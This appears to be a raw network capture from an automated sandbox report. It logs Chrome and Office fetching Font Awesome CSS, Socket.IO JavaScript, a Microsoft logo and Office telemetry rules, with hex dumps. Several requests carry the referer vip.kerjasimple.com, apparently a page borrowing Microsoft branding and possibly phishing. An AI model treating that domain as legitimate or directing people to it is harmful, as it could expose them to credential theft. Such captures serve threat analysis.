                                                        2024-11-12 15:27:03 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:03 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 477
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                        ETag: "0x8DC582BB8CEAC16"
                                                        x-ms-request-id: 6bd3c087-001e-000b-13fd-2c15a7000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152703Z-16547b76f7fxdzxghC1DFWmf7n0000000fug00000000ku0q
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:03 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28192.168.2.64974613.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:03 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:03 UTC491INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:03 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 464
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                        ETag: "0x8DC582B97FB6C3C"
                                                        x-ms-request-id: 63ea3643-901e-0015-3101-2db284000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152703Z-16547b76f7f7rtshhC1DFWrtqn0000000fxg000000004t2z
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:03 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        29192.168.2.649749104.17.25.144436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:03 UTC581OUTGET /ajax/libs/font-awesome/6.1.1/css/all.min.css HTTP/1.1
                                                        Host: cdnjs.cloudflare.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://vip.kerjasimple.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-12 15:27:03 UTC950INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:03 GMT
                                                        Content-Type: text/css; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: public, max-age=30672000
                                                        ETag: W/"623a082a-4ef8"
                                                        Last-Modified: Tue, 22 Mar 2022 17:32:26 GMT
                                                        cf-cdnjs-via: cfworker/kv
                                                        Cross-Origin-Resource-Policy: cross-origin
                                                        Timing-Allow-Origin: *
                                                        X-Content-Type-Options: nosniff
                                                        CF-Cache-Status: HIT
                                                        Age: 110494
                                                        Expires: Sun, 02 Nov 2025 15:27:03 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Ffiq%2FVwuB443zTR7Fr6sqhy7u6QqFzx%2BKPKsu3Yw6TAgCStjvRVhkWVBjEK%2BN6qsCg8sf71mBeOUJUYQRMYEv%2BevgByjiffDnU7mGw5PUnjqC%2Fd2Mu2SAMysUePAUlFjRmiIRy5W"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                        Strict-Transport-Security: max-age=15780000
                                                        Server: cloudflare
                                                        CF-RAY: 8e178b4068726be9-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-11-12 15:27:03 UTC419INData Raw: 37 62 66 61 0d 0a 2f 2a 21 0a 20 2a 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 46 72 65 65 20 36 2e 31 2e 31 20 62 79 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 0a 20 2a 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 2f 66 72 65 65 20 28 49 63 6f 6e 73 3a 20 43 43 20 42 59 20 34 2e 30 2c 20 46 6f 6e 74 73 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 6f 64 65 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 32 20 46 6f 6e 74 69 63 6f 6e 73 2c 20 49 6e 63 2e 0a 20 2a 2f 0a 2e 66 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 66 61 2d 73 74 79 6c 65
                                                        Data Ascii: 7bfa/*! * Font Awesome Free 6.1.1 by @fontawesome - https://fontawesome.com * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) * Copyright 2022 Fonticons, Inc. */.fa{font-family:var(--fa-style
                                                        2024-11-12 15:27:03 UTC1369INData Raw: 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 67 72 61 79 73 63 61 6c 65 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 64 69 73 70 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 64 69 73 70 6c 61 79 2c 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 29 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 76 61 72 69 61 6e 74 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 74 65 78 74 2d 72 65 6e 64 65 72 69 6e 67 3a 61 75 74 6f 7d 2e 66 61 2d 31 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 2e 66 61 2d 32 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 7d 2e 66 61 2d 33 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 65 6d 7d 2e 66 61 2d 34 78 7b 66 6f 6e 74 2d 73 69 7a
                                                        Data Ascii: z-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-siz
                                                        2024-11-12 15:27:03 UTC1369INData Raw: 2d 2d 66 61 2d 70 75 6c 6c 2d 6d 61 72 67 69 6e 2c 2e 33 65 6d 29 7d 2e 66 61 2d 62 65 61 74 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 61 6e 69 6d 61 74 69 6f
                                                        Data Ascii: --fa-pull-margin,.3em)}.fa-beat{-webkit-animation-name:fa-beat;animation-name:fa-beat;-webkit-animation-delay:var(--fa-animation-delay,0);animation-delay:var(--fa-animation-delay,0);-webkit-animation-direction:var(--fa-animation-direction,normal);animatio
                                                        2024-11-12 15:27:03 UTC1369INData Raw: 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 38 2c 2e 38 34 2c 2e 34 32 2c 31 29 29 7d 2e 66 61 2d 66 61 64 65 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 61 64 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 61 64 65 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e
                                                        Data Ascii: -fa-animation-timing,cubic-bezier(.28,.84,.42,1))}.fa-fade{-webkit-animation-name:fa-fade;animation-name:fa-fade;-webkit-animation-iteration-count:var(--fa-animation-iteration-count,infinite);animation-iteration-count:var(--fa-animation-iteration-count,in
                                                        2024-11-12 15:27:03 UTC1369INData Raw: 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e
                                                        Data Ascii: on-direction,normal);animation-direction:var(--fa-animation-direction,normal);-webkit-animation-duration:var(--fa-animation-duration,1s);animation-duration:var(--fa-animation-duration,1s);-webkit-animation-iteration-count:var(--fa-animation-iteration-coun
                                                        2024-11-12 15:27:03 UTC1369INData Raw: 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 6c 69 6e 65 61 72 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 6c 69 6e 65 61 72 29 7d 2e 66 61 2d 73 70
                                                        Data Ascii: ount:var(--fa-animation-iteration-count,infinite);animation-iteration-count:var(--fa-animation-iteration-count,infinite);-webkit-animation-timing-function:var(--fa-animation-timing,linear);animation-timing-function:var(--fa-animation-timing,linear)}.fa-sp
                                                        2024-11-12 15:27:03 UTC1369INData Raw: 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 7b 30 25 2c 39 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 34 35 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 6f 75 6e 63 65 7b 30 25 7b 2d 77 65
                                                        Data Ascii: 25));transform:scale(var(--fa-beat-scale,1.25))}}@keyframes fa-beat{0%,90%{-webkit-transform:scale(1);transform:scale(1)}45%{-webkit-transform:scale(var(--fa-beat-scale,1.25));transform:scale(var(--fa-beat-scale,1.25))}}@-webkit-keyframes fa-bounce{0%{-we
                                                        2024-11-12 15:27:03 UTC1369INData Raw: 65 59 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 31 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 78 2c 31 2e 31 29 2c 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 79 2c 2e 39 29 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 78 2c 31 2e 31 29 2c 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 79 2c 2e 39 29 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 33 30 25 7b
                                                        Data Ascii: eY(0);transform:scale(1) translateY(0)}10%{-webkit-transform:scale(var(--fa-bounce-start-scale-x,1.1),var(--fa-bounce-start-scale-y,.9)) translateY(0);transform:scale(var(--fa-bounce-start-scale-x,1.1),var(--fa-bounce-start-scale-y,.9)) translateY(0)}30%{
                                                        2024-11-12 15:27:03 UTC1369INData Raw: 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 2d 66 61 64 65 7b 30 25 2c 74 6f 7b 6f 70 61 63 69 74 79 3a 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 6f 70 61 63 69 74 79 2c 2e 34 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 35 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29
                                                        Data Ascii: t-fade-scale,1.125))}}@keyframes fa-beat-fade{0%,to{opacity:var(--fa-beat-fade-opacity,.4);-webkit-transform:scale(1);transform:scale(1)}50%{opacity:1;-webkit-transform:scale(var(--fa-beat-fade-scale,1.125));transform:scale(var(--fa-beat-fade-scale,1.125)
                                                        2024-11-12 15:27:04 UTC1369INData Raw: 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 35 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 35 64 65 67 29 7d 34 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 35 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 35 64 65 67 29 7d 38 25 2c 32 34 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 38 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 38 64 65 67 29 7d 31 32 25 2c 32 38 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 64 65 67 29 7d 31 36 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66
                                                        Data Ascii: ransform:rotate(-15deg);transform:rotate(-15deg)}4%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}8%,24%{-webkit-transform:rotate(-18deg);transform:rotate(-18deg)}12%,28%{-webkit-transform:rotate(18deg);transform:rotate(18deg)}16%{-webkit-transf


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        30192.168.2.64975213.107.246.454436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:04 UTC657OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                                        Host: aadcdn.msauth.net
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://vip.kerjasimple.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-12 15:27:04 UTC785INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:04 GMT
                                                        Content-Type: image/svg+xml
                                                        Content-Length: 1435
                                                        Connection: close
                                                        Cache-Control: public, max-age=31536000
                                                        Content-Encoding: gzip
                                                        Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                                        ETag: 0x8DB5C3F4911527F
                                                        x-ms-request-id: e91bd8aa-c01e-0021-69bf-349092000000
                                                        x-ms-version: 2009-09-19
                                                        x-ms-lease-status: unlocked
                                                        x-ms-blob-type: BlockBlob
                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        x-azure-ref: 20241112T152704Z-15869dbbcc6vr5dxhC1DFWyw4g00000001z0000000005n44
                                                        x-fd-int-roxy-purgeid: 4554691
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:04 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                                        Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        31192.168.2.64975018.245.31.894436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:04 UTC359OUTGET /4.7.5/socket.io.min.js HTTP/1.1
                                                        Host: cdn.socket.io
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-12 15:27:04 UTC702INHTTP/1.1 200 OK
                                                        Content-Type: application/javascript; charset=utf-8
                                                        Content-Length: 49993
                                                        Connection: close
                                                        Accept-Ranges: bytes
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: public, max-age=31536000, immutable
                                                        Content-Disposition: inline; filename="socket.io.min.js"
                                                        Date: Sat, 03 Aug 2024 07:26:50 GMT
                                                        ETag: "777eb8fd4f8320b6e5cc9a7159bdec6a"
                                                        Server: Vercel
                                                        Strict-Transport-Security: max-age=63072000
                                                        X-Vercel-Cache: HIT
                                                        X-Vercel-Id: fra1::4xmtd-1722670010047-e30d468233ba
                                                        X-Cache: Hit from cloudfront
                                                        Via: 1.1 b81e506afc0d8b7cd6094e636331ca78.cloudfront.net (CloudFront)
                                                        X-Amz-Cf-Pop: FRA56-P8
                                                        X-Amz-Cf-Id: ruT31j_YV4ntD2SWNOdjsIbCoPZqrXfRGe8def6r2TuWqV7atSBJWQ==
                                                        Age: 9132615
                                                        2024-11-12 15:27:04 UTC15682INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 37 2e 35 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 34 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                                        Data Ascii: /*! * Socket.IO v4.7.5 * (c) 2014-2024 Guillermo Rauch * Released under the MIT License. */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof g
